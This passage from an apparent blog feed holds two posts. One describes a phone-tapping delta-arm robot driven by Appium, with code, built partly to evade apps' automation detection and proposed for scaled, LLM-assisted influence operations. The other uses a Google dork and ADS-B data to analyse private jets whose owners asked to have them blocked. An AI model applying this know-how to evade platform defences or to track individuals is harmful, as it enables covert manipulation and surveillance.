      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5bf6ec4aad6338f2420206306b510a41/5b587/calibration.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.27027027027027%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABJ0AAASdAHeZh94AAABW0lEQVQoz3WRW2+CQBCF+f+/pfWhiSbeoCI3E7WKlFS5o4EUKwIKVAvYg5uQtknnYTPMnm84M0tVVfV1j7Isbz8Cn0VR4Pb2f1BQeJ73cTj4vs8wjCRJoihyHGcYxm63C8MQItJCVVUWAkHgWVbk+RomP8HpOA5D0wBc153NZtPpFPUsyxoB0+9vRMFdvOC602qVVUU1jbfbrSzLeZ6naWrbtqIoKMIXGQq5xPPh+i21rMw0+MGgKMtf8Hw+P51OcRzruk5g5FEUnc9n5MJ4HKivsWkmusb2un9huE2SBGpN0whMDBMB4HdFiXQ93mzY7h3GBbyRmVer1eVygXPkGAFFGK7uUdvmuGi9zl3n0zK5Xq+GIcWegyDAejvtNvjlcsmORlg4Vr3f7wkP+Hk4nNC0PJksBP7p8QE1qnnn6/VqmiZaYGDLsuA/zepo3v94PGqGYVo2Ts/3UPkG187sduSec0UAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Calibration&quot;
        title=&quot;Calibration&quot;
        src=&quot;/static/5bf6ec4aad6338f2420206306b510a41/fcda8/calibration.png&quot;
        srcset=&quot;/static/5bf6ec4aad6338f2420206306b510a41/12f09/calibration.png 148w,
/static/5bf6ec4aad6338f2420206306b510a41/e4a3f/calibration.png 295w,
/static/5bf6ec4aad6338f2420206306b510a41/fcda8/calibration.png 590w,
/static/5bf6ec4aad6338f2420206306b510a41/efc66/calibration.png 885w,
/static/5bf6ec4aad6338f2420206306b510a41/5b587/calibration.png 1010w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;From there, a more automated approach was developed. Using the node server, the delta arm was programmatically guided to trace a grid pattern across the screen. This grid mapped the relationship between the delta arm’s movements and the corresponding points on the screen.&lt;/p&gt;
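&lt;p&gt;One way to turn four manually measured corners into a grid of arm targets is bilinear interpolation between them. The sketch below assumes the corners are given in arm coordinates in the order top-left, top-right, bottom-right, bottom-left, and produces a 10 × 10 grid (100 points); the function names are hypothetical and this is not the original node server’s code.&lt;/p&gt;

```python
# Hypothetical sketch: turn four manually measured corner positions into a
# grid of arm targets using bilinear interpolation.

Point = tuple[float, float]


def bilinear(corners: list[Point], u: float, v: float) -> Point:
    """Interpolate an arm position inside the quadrilateral `corners`.

    corners: arm positions for top-left, top-right, bottom-right, bottom-left.
    u, v: normalised screen position, 0.0 (left/top) to 1.0 (right/bottom).
    """
    (x0, y0), (x1, y1), (x2, y2), (x3, y3) = corners
    # Interpolate along the top and bottom edges, then blend between them.
    top = (x0 + (x1 - x0) * u, y0 + (y1 - y0) * u)
    bottom = (x3 + (x2 - x3) * u, y3 + (y2 - y3) * u)
    return (top[0] + (bottom[0] - top[0]) * v,
            top[1] + (bottom[1] - top[1]) * v)


def grid_targets(corners: list[Point], rows: int = 10, cols: int = 10):
    """Yield (u, v, arm_x, arm_y) for an evenly spaced grid (rows, cols >= 2)."""
    for r in range(rows):
        for c in range(cols):
            u, v = c / (cols - 1), r / (rows - 1)
            yield (u, v, *bilinear(corners, u, v))
```

&lt;p&gt;Each target would then be visited and tapped while the resulting touch position is recorded, so that the grid pairs nominal arm positions with what the device actually registered.&lt;/p&gt;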
&lt;p&gt;By connecting to the device via ADB (Android Debug Bridge), the stylus positions were recorded at each point along the grid. This process allowed approximately 100 unique screen positions to be mapped to 100 corresponding delta arm positions.&lt;/p&gt;
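&lt;p&gt;The touch positions themselves can be read from the kernel input events that &lt;code&gt;adb shell getevent -l&lt;/code&gt; prints. The sketch below is one hypothetical way to parse that output into (x, y) pairs; it assumes a multi-touch touchscreen reporting &lt;code&gt;ABS_MT_POSITION_X&lt;/code&gt;/&lt;code&gt;ABS_MT_POSITION_Y&lt;/code&gt; and returns raw digitiser units, which on some devices need scaling to screen pixels using the axis ranges shown by &lt;code&gt;getevent -p&lt;/code&gt;.&lt;/p&gt;

```python
# Hypothetical sketch: extract touch coordinates from `adb shell getevent -l`.


def parse_touch_points(lines) -> list[tuple[int, int]]:
    """Return one (x, y) pair per input frame that carried a new position.

    Assumes labelled getevent output where positions arrive as
    ABS_MT_POSITION_X / ABS_MT_POSITION_Y with hexadecimal values and each
    frame ends with EV_SYN SYN_REPORT. Only the latest X and Y are tracked,
    which suits single-stylus taps. Values are raw digitiser units.
    """
    points = []
    x = y = None
    changed = False
    for line in lines:
        tokens = line.split()
        if "ABS_MT_POSITION_X" in tokens:
            x = int(tokens[tokens.index("ABS_MT_POSITION_X") + 1], 16)
            changed = True
        elif "ABS_MT_POSITION_Y" in tokens:
            y = int(tokens[tokens.index("ABS_MT_POSITION_Y") + 1], 16)
            changed = True
        elif "SYN_REPORT" in tokens:
            # Frame complete: keep it only if X or Y changed since the last frame.
            if changed and x is not None and y is not None:
                points.append((x, y))
            changed = False
    return points


# Usage (hypothetical file name): capture `adb shell getevent -l` output to
# touches.txt while the arm taps each grid point, then:
#   with open("touches.txt") as fh:
#       points = parse_touch_points(fh)
```

&lt;p&gt;For a calibration tap, the first point recorded after the stylus makes contact is usually the one to pair with the arm position that produced it.&lt;/p&gt;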
&lt;p&gt;After the initial grid mapping, a period of experimentation with various algorithms was conducted to identify the most precise way to represent the relationship between the delta arm’s movements and the screen coordinates. The aim was to ensure the delta arm could achieve a high enough level of accuracy to replicate typing actions in Appium using the on-screen keyboard, making these interactions consistent and reliable on the actual device.&lt;/p&gt;
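&lt;p&gt;Which algorithm was finally selected isn’t specified, but one simple candidate for this kind of experiment is inverse distance weighting (IDW): estimate the arm position for any screen point as a weighted average of the nearest calibration samples, with closer samples weighted more heavily. The sketch below is a hypothetical illustration of that technique, not necessarily the method that was chosen; &lt;code&gt;k&lt;/code&gt; and &lt;code&gt;power&lt;/code&gt; are tuning assumptions.&lt;/p&gt;

```python
import math

Point = tuple[float, float]


def idw_screen_to_arm(samples: list[tuple[Point, Point]], screen: Point,
                      k: int = 4, power: float = 2.0) -> Point:
    """Estimate an arm position for `screen` from (screen, arm) calibration pairs.

    Uses the k nearest samples in screen space, weighted by 1 / distance**power.
    """
    if not samples:
        raise ValueError("need at least one calibration sample")
    # Rank calibration pairs by screen-space distance to the query point.
    ranked = sorted(samples, key=lambda s: math.dist(s[0], screen))[:k]
    num_x = num_y = den = 0.0
    for sample_screen, (arm_x, arm_y) in ranked:
        d = math.dist(sample_screen, screen)
        if d == 0.0:
            # Exact hit on a calibration point: return its measured arm position.
            return (arm_x, arm_y)
        w = 1.0 / d ** power
        num_x += w * arm_x
        num_y += w * arm_y
        den += w
    return (num_x / den, num_y / den)
```

&lt;p&gt;IDW reproduces the calibration points exactly and needs no model of the arm’s geometry, which suits a build with unknown imperfections; the trade-off is that it cannot extrapolate beyond the sampled grid.&lt;/p&gt;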
&lt;p&gt;Once a suitable algorithm was selected, the next step was to configure Appium to send commands that could convert screen instructions into delta arm positions, enabling the arm to type on the device. I modified Appium to integrate with the delta arm server, adding a command line flag to specify the server’s address.&lt;/p&gt;
&lt;p&gt;When this flag is provided, Appium redirects all gesture commands, which would typically go to the automation API, to the robot server through a REST API call. The server then translates these commands into delta arm movements, allowing the robot to perform the actions, such as typing, and reports the results back to Appium. This setup ensured seamless(-ish!) conversion of screen interactions into precise physical gestures executed by the delta arm.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/5fc68957d2abd71bf426c3562f000091/arm.gif&quot; alt=&quot;arm&quot;&gt;&lt;/p&gt;
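&lt;p&gt;Assuming the forwarded gesture commands use the W3C WebDriver Actions format in which Appium gestures are commonly expressed (sequences of &lt;code&gt;pointerMove&lt;/code&gt;, &lt;code&gt;pointerDown&lt;/code&gt;, &lt;code&gt;pause&lt;/code&gt; and &lt;code&gt;pointerUp&lt;/code&gt;), the robot server’s translation step could look roughly like the hypothetical sketch below. The arm command tuples and the &lt;code&gt;screen_to_arm&lt;/code&gt; callback (for example, a fitted calibration mapping) are assumptions, not the actual server’s interface.&lt;/p&gt;

```python
from typing import Any, Callable

Point = tuple[float, float]


def actions_to_arm_commands(payload: dict[str, Any],
                            screen_to_arm: Callable[[float, float], Point]) -> list[tuple]:
    """Translate W3C WebDriver pointer actions into hypothetical arm commands.

    Handles pointerMove (viewport origin only), pointerDown, pointerUp and
    pause. A single stylus can only follow one pointer, so multiple pointer
    sources are simply processed one after another.
    """
    commands: list[tuple] = []
    for source in payload.get("actions", []):
        if source.get("type") != "pointer":
            continue  # key, wheel and "none" sources are ignored here
        for action in source.get("actions", []):
            kind = action.get("type")
            if kind == "pointerMove":
                if action.get("origin", "viewport") != "viewport":
                    raise ValueError("only viewport-relative moves are supported")
                arm_x, arm_y = screen_to_arm(action["x"], action["y"])
                commands.append(("move", arm_x, arm_y, action.get("duration", 0)))
            elif kind == "pointerDown":
                commands.append(("down",))  # lower the stylus onto the screen
            elif kind == "pointerUp":
                commands.append(("up",))    # lift the stylus
            elif kind == "pause":
                commands.append(("wait", action.get("duration", 0)))
    return commands


# A single tap at (540, 1200), expressed as W3C pointer actions.
tap = {"actions": [{
    "type": "pointer", "id": "finger1", "parameters": {"pointerType": "touch"},
    "actions": [
        {"type": "pointerMove", "duration": 0, "x": 540, "y": 1200},
        {"type": "pointerDown", "button": 0},
        {"type": "pause", "duration": 100},
        {"type": "pointerUp", "button": 0},
    ],
}]}
print(actions_to_arm_commands(tap, lambda x, y: (x / 20, y / 20)))
```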
&lt;p&gt;Despite some occasional erratic movements, which were difficult to diagnose and troubleshoot, the system was largely successful. The delta arm could reliably type and interact with a wide range of social media platforms, effectively replicating typical user behaviours such as tapping, scrolling, and typing text.&lt;/p&gt;
&lt;p&gt;During this project I experimented with a “fire and forget” approach to interacting with the device: sending instructions without the feedback channel provided by ADB. While it is possible to maintain a constant connection between Appium and the device via ADB, allowing real-time feedback on the delta arm’s movements, I suspected that, depending on the application’s permissions, ADB activity could be relatively easy to detect.&lt;/p&gt;
&lt;p&gt;Since ADB is often associated with automation or testing environments, certain apps might use this detection as a signal that automation is in play, which could trigger defensive measures, such as limiting functionality or altering the user interface. This would undermine the goal of mimicking natural human interactions undetected.&lt;/p&gt;
&lt;p&gt;While this approach was feasible, it became problematic with longer chains of interactions. For instance, when trying to type multiple social media posts or perform extended sequences of actions, the system’s reliability diminished. To maintain accuracy, it was necessary to begin each task from a known starting point, such as restarting the app or resetting the device to a specific screen. This allowed the delta arm to execute a single set of instructions without accumulating errors from previous interactions.&lt;/p&gt;
&lt;p&gt;I hope to find time for further experimentation. I suspect a solution for handling more complex interactions will involve using two devices. One device would remain connected to ADB, actively browsing social media applications and identifying posts to interact with. This device could leverage a large language model (LLM) or similar AI to generate appropriate responses to posts. The second device, isolated from ADB to avoid detection, would be operated by the delta arm, executing the actual posting of the generated content.&lt;/p&gt;
&lt;p&gt;This setup could address the limitations of the current “fire and forget” approach by separating the content generation and interaction tasks. The ADB-connected device could handle the intelligence-heavy operations, such as parsing social media content, analysing sentiment, and determining the context for responding. Meanwhile, the non-bridged delta arm device would focus solely on the manual task of typing and posting, (hopefully) maintaining a lower profile by avoiding ADB activity that might be detected by the app. It would also be possible to randomise or replicate the time between button presses or the trajectory of a drag across the screen if these actions were detectable.&lt;/p&gt;
&lt;p&gt;In conclusion, while the challenges of developing an affordable, delta-arm-based system to automate social media interactions at scale are significant, they don’t feel insurmountable. However, I lack the expertise to determine whether this approach would successfully evade detection over a longer period.&lt;/p&gt;
&lt;p&gt;Scaling the process to operate with 5, 10, or even 100 delta arms could significantly reduce the barrier to entry for conducting semi-sophisticated influence operations without relying heavily on human labour. This approach could unlock new possibilities for managing information dissemination and efficiently countering disinformation.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[OSINT for understanding blocked HNWI plane activity]]></title><description><![CDATA[Flights Introduction During an Open Source Intelligence (OSINT) investigation, there are occasions when tracking an aircraft associated with…]]></description><link>https://dfworks.com/blog/hnwi-osint-private-jet/</link><guid isPermaLink="false">https://dfworks.com/blog/hnwi-osint-private-jet/</guid><pubDate>Mon, 08 Jan 2024 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;img src=&quot;/e2ff11202ba3bf05849437626f79234e/planes_travel.gif&quot; alt=&quot;Flights&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;During an Open Source Intelligence (OSINT) investigation, there are occasions when tracking an aircraft associated with a particular individual or corporation becomes necessary. This tracking is made possible through flight data provided by platforms like &lt;a href=&quot;https://www.radarbox.com/&quot;&gt;RadarBox&lt;/a&gt; or &lt;a href=&quot;https://www.flightradar24.com/&quot;&gt;Flightradar24&lt;/a&gt;. These services aggregate data from &lt;a href=&quot;https://en.wikipedia.org/wiki/Automatic_Dependent_Surveillance%E2%80%93Broadcast&quot;&gt;ADS-B&lt;/a&gt; receivers (ground stations that pick up the position reports aircraft broadcast) and display the trajectories and routes of various aircraft. Nonetheless, it’s not uncommon to find that data pertaining to specific planes is missing from these platforms. Often, this omission stems from legal demands made by high-net-worth individuals (HNWIs) prioritising their privacy, although military and government flight information is also commonly excluded from these datasets.&lt;/p&gt;
&lt;p&gt;This article analyses 275 aircraft that meet these criteria, all featuring in RadarBox’s &lt;a href=&quot;https://www.radarbox.com/faq#tracking-and-ads-b:~:text=2.%20Why%20are%20some%20aircraft%20on%20the%20map%20labelled%20%E2%80%9Cblocked%E2%80%9D%3F&quot;&gt;blocked list&lt;/a&gt;. Using a dataset derived from a Google dork query, the analysis focuses on the 2023 flight paths of these aircraft, while also exploring ownership, co-location and other notable trends.&lt;/p&gt;
&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;Aircraft tracking has been made possible by the advent of ADS-B, which has been increasingly adopted across jurisdictions since the late 2000s. This system, which relies on aircraft broadcasting their location, speed, and other data, has been a game-changer for both aviation professionals and enthusiasts. Websites like RadarBox and FlightTracker have capitalised on this technology to provide real-time tracking of aircraft around the globe. As mentioned, the data available on these platforms can sometimes be incomplete for various reasons, including legal pressure, especially from individuals or entities keen on keeping their travel details confidential.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://globe.adsbexchange.com&quot;&gt;ADS-B Exchange&lt;/a&gt; stands out as a unique player in the flight data market and is the resource used for this study. It is a network of hobbyists and enthusiasts who share a passion for aircraft tracking. This community-driven approach has fostered a more resilient ethos, and the platform is less prone to censorship or removal requests, making it a great OSINT resource.&lt;/p&gt;
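&lt;p&gt;Part of what makes community receivers hard to censor is that ADS-B messages broadcast by an aircraft’s Mode S transponder (downlink format 17) carry its 24-bit ICAO address in the clear, so any receiver can attribute a message to an airframe whether or not an aggregator chooses to display it. The hypothetical sketch below extracts the downlink format and ICAO address from a raw 112-bit message in hex; the sample message is illustrative, not taken from this study’s data.&lt;/p&gt;

```python
def decode_df_and_icao(msg_hex: str) -> tuple[int, str]:
    """Return (downlink format, ICAO address) from a raw 112-bit Mode S message.

    The first 5 bits hold the downlink format (17 for ADS-B from a Mode S
    transponder); the next 3 bits are capability, and bits 9-32 are the
    24-bit ICAO aircraft address.
    """
    msg_hex = msg_hex.strip().upper()
    if len(msg_hex) != 28:  # 112 bits = 28 hex characters
        raise ValueError("expected a 112-bit extended squitter message")
    first_byte = int(msg_hex[0:2], 16)
    downlink_format = first_byte >> 3  # keep the top 5 bits
    icao_address = msg_hex[2:8]        # the three bytes after the first
    return downlink_format, icao_address


# Illustrative message (not from this study's dataset).
print(decode_df_and_icao("8D4840D6202CC371C32CE0576098"))
```

&lt;p&gt;Mapping the ICAO address to a registration and owner then requires a separate lookup against registry data.&lt;/p&gt;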
&lt;p&gt;The significance of flight data, both its accessibility and the efforts made to conceal it, is underscored in the financial trading sector. Traders have been known to leverage such information to forecast mergers and acquisitions. Analysis of these flights and their frequencies, especially to locations known for hosting corporate negotiations or legal consultations, can afford early insights into possible market-shifting events.&lt;/p&gt;
&lt;h2&gt;Google Dork&lt;/h2&gt;
&lt;p&gt;The Google Dork query &lt;strong&gt;site:radarbox.com “This aircraft is present on our blocked aircraft list”&lt;/strong&gt; was used as a starting point for the investigation. A Google Dork is a search technique that employs specific search strings to unearth information which might otherwise not rank highly in search engine results. In this case, the query is tailored to search within the domain of RadarBox for a specific phrase: “This aircraft is present on our blocked aircraft list”.&lt;/p&gt;
&lt;p&gt;The query pinpoints the exact pages on RadarBox where aircraft are listed as ‘blocked’. These listings are significant because they often relate to aircraft whose flight details are deliberately concealed. The aircraft pages were used to compile a dataset with the aim of identifying interesting patterns, such as frequent travel to certain destinations or co-location with other blocked aircraft.&lt;/p&gt;
&lt;h2&gt;Initial Analysis&lt;/h2&gt;
&lt;p&gt;As you might expect, patterns emerging from initial analysis are indicative of typical private aircraft use, particularly when considering the types of aircraft and their respective destinations. These patterns offer a glimpse into the travel habits and preferences of HNWIs.&lt;/p&gt;
&lt;p&gt;The dataset reveals a diverse range of aircraft manufacturers. However, certain brands stand out, indicating a preference for specific manufacturers known for their prestige. &lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.94594594594594%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsSAAALEgHS3X78AAACNElEQVQoz3VSy24TMRTNmi9gxwKJT4AvgH+oumHLpmKBBGLDgg0gUQmxqAQFxEOIBagSrcSztEUtRZS2pCRKO82jSSYZjz1jz8vjmbHH4WZAIlHbs7he2Ofec851aVBAaw0VY9zpdhGyXdclGFOCkNXrmr2+hXgUDQ6hNEpWKpcyA4g0w168WLHqyBsMcuYSPwiPJRNCTNNkjCZSmzRtEvG96Z+68u701Q9TL8u1rgMt9HHkPM8HOg+FNOzYsAUOMzfMXm+Yl57+PDn19tzNpUovGD7T+ggyQOa6QYRhRaaF/zpUSoYUL2y1z1z/NDm7EXIOQXieh4s6RmY820OxH0sFtqWEESrXCg4pHi3vTr74tdVlkUcJcZIkgVzGyNV+uGOGY84Kkb7nlWvGzFprrcUSHlLGjpC9WqcrhiOEUFKOGoM5tf3meoMZmPMoDILgPxkEgAER8822/7GCehYSiRjdH7xu1o1yvW/7KXDhC4Bnx3Hgdkh2XZrEvOXE8zs2CoZmCre6GCt6nYPHbxan793vtNucc+ilCozJzlT+ZZc8WG9vtmyX2DpXkc985s5+rp6YeH7xzkKexnaRMzCllFBLI9EMrCCd/tq68X7v1ba5tO88WWtcm6+dvb16/tZyrUt9RjGGZQ0Bnwq6lKBB+A9RlsR915/7bd1daVyeq16Y+THxbPvht44bCubYtj20ihAC25ZlQZAlEEALeIy5lAawfa15qkwWH9C4T5hPiSrWfhh/ALjIAsSNR/VmAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Aircraft Manufacturers&quot;
        title=&quot;Aircraft Manufacturers&quot;
        src=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png&quot;
        srcset=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/12f09/manufacturers.png 148w,
/static/ff2777c43afc13d3c1b27cb72a8cb498/e4a3f/manufacturers.png 295w,
/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Analysis of plane models within the dataset shows that high-end models, such as the Bombardier Global series, feature prominently. These models are renowned for their range and comfort, aligning with the travel needs and expectations of HNWIs.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 79.72972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsSAAALEgHS3X78AAAB/ElEQVQoz21Su47TQBRNTcuH8C37F3wBzTaIjp6Ch7SUUJIiIJDQiopdJJpFu0nWTizs2BnH8dhje+aO5xXuJiKyk4wsezy+x+fcc89g019KKc/3J5NpFEVZlhFCkjieB4Hn+XVdY4Fzbl882O92p3gDEMF8ltMCWtUIKUCqtgUAbcwB06CLzHNKkkRqt6pNSFt/BbMMglymlVZboDsJ1lpzLpwx61peTtY/PDrPIKRyQSVuxkvupaIU+jSzUroqKWHi3VU4vElvwiLLC2wYFRm3oVwjeLLkNZhDMDaT57kx5v314vzz5PvtYk2WnPNuXQXmnoggA3tgmLEWmmq+qs4ufj8b3nn+rGKsa+zusSxbJK9A708ewEXJWs6+3aZPXly+HP1ZLyOle/J2pbU0dwnPKtUDcwEbLT/8/Pv46afnH3/RNNbGHoN5a9C5lLU92VXdQF0Mr4JHZ2/PX48Cf4yz7crGvqw1DPQJZkxVWRYko6/eXIy+fG04OGe7I2WMxfHCi4tpCo00PWb8LX62WkUkQ0tW9eE8cdFGjRMe5lIIIaU8jOdW3iZYwzhpFoXEDo1xxjqpLGHtdJsT0K4sCradRS+eO53K2JA+RAolzFYC43VPOL7ihrf2dMJ63roNehMXElXgFVGZN0r/N8G5PdERuOsT1nd9c0c0/wCFJZAuJdnfFgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Aircraft Models&quot;
        title=&quot;Aircraft Models&quot;
        src=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png&quot;
        srcset=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/12f09/models.png 148w,
/static/5c0c9ab014e6e78f48c9693bf516b6da/e4a3f/models.png 295w,
/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The countries of registration for these aircraft also tell a story. Certain jurisdictions may be chosen for their favourable tax regimes or privacy laws, factors often considered by affluent individuals and corporations.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsSAAALEgHS3X78AAAB00lEQVQoz4VTzW7TQBDOa3DmnbjwDpyRKkolDlyR6IE3QKKi4gBKKiFQhSjqJeAS2jqEJHYax7vrjX/W3rW9P2Ecp1VsRfBptdLOzjffzOxsZ9UEpdR1XeSjMAwJRpRgjBHCZO55QoiWc6d1VkrJsgIvJIr4YB4GjK+MBqtS+j9kAC+NS4sRFudOvN8bPv80en+JWaFWxiitd5PNeo+5vF5kvxEnrAwzaXnxmx/ek6796swJEh5grLf4DeVC6qHPJ0SUymxHvPCS/Z79+vu8nbZZQ+vKDcUlyHLIcE2DpSFVU111r9DBiT0Lq54ZswndSZLE932EEGPMofk0ELdXG+j12Qn50xP7bLq8s2yUoQzYoBljwm+WeSu32tOPxUHv+uOQNMjbfk6QQ8G6KV1XFAp1dBH8WiRGFhnnWZbled7Zbgx0+MrLmFC1IKw6UKHM6Zev5/2fcSomkzHMD8xSFEUNZanNH8zhndJC3SUMxmfHg3sPXh53P7M4cmczIO8eEmj1CHHbz0Y4u1wwKPLR28H9x72Hh9+cxZJSUkppbrFjwuC1CZP9GXtn+S9Ox3sf7KO+Vz2Kd0Pp8l/jWRefpSkiQZqrgAn4Fp4ztixrOnVazn8BSOYaKC7PyeIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Countries of Registration&quot;
        title=&quot;Countries of Registration&quot;
        src=&quot;/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png&quot;
        srcset=&quot;/static/aaa15d04b65f0f467c67455af9165730/12f09/countries.png 148w,
/static/aaa15d04b65f0f467c67455af9165730/e4a3f/countries.png 295w,
/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
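&lt;p&gt;Charts like the three above are essentially frequency counts over the compiled dataset. A minimal sketch, assuming each aircraft is a dict with hypothetical &lt;code&gt;manufacturer&lt;/code&gt;, &lt;code&gt;model&lt;/code&gt; and &lt;code&gt;country&lt;/code&gt; keys (field names and sample records are placeholders, not the actual data):&lt;/p&gt;

```python
from collections import Counter


def tally(records: list[dict], field: str, top: int = 10) -> list[tuple[str, int]]:
    """Return the `top` most common values of `field`, skipping missing entries."""
    counts = Counter(r[field] for r in records if r.get(field))
    return counts.most_common(top)


# Hypothetical placeholder records for illustration only; not the study's dataset.
records = [
    {"manufacturer": "Maker A", "model": "Model X", "country": "Country 1"},
    {"manufacturer": "Maker B", "model": "Model Y", "country": "Country 2"},
    {"manufacturer": "Maker A", "model": "Model Z", "country": "Country 1"},
]
for field in ("manufacturer", "model", "country"):
    print(field, tally(records, field))
```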
&lt;p&gt;A significant portion of these aircraft are held by LLC, Ltd and Inc entities. This ownership structure is indicative of attempts to manage privacy and liability and, sometimes, to leverage financial benefits. The complexity of these structures can often mirror the intricate financial and legal arrangements typical of HNWI affairs.&lt;/p&gt;
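&lt;p&gt;Owner names can be bucketed roughly by their trailing legal suffix. The hypothetical sketch below does this with regular expressions; the suffix list is an assumption and far from exhaustive, so trusts, individuals and many non-English entity types fall into “Other”.&lt;/p&gt;

```python
import re

# Common legal-entity suffixes (an assumed, non-exhaustive list).
ENTITY_PATTERNS = {
    "LLC": re.compile(r"\bL\.?L\.?C\.?$", re.IGNORECASE),
    "Ltd": re.compile(r"\b(LTD|LIMITED)\.?$", re.IGNORECASE),
    "Inc": re.compile(r"\b(INC|INCORPORATED)\.?$", re.IGNORECASE),
}


def entity_type(owner: str) -> str:
    """Classify a registered owner name by its trailing legal suffix."""
    name = owner.strip().rstrip(",")
    for label, pattern in ENTITY_PATTERNS.items():
        if pattern.search(name):
            return label
    return "Other"


print(entity_type("Example Aviation Holdings LLC"))
```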
&lt;h2&gt;Co-location Analysis&lt;/h2&gt;
&lt;p&gt;Below is a co-location matrix showing how often different pairs of aircraft were co-located throughout 2023.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/7a884a9c4587747dec153c760e6e8010/01e7c/matrix.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
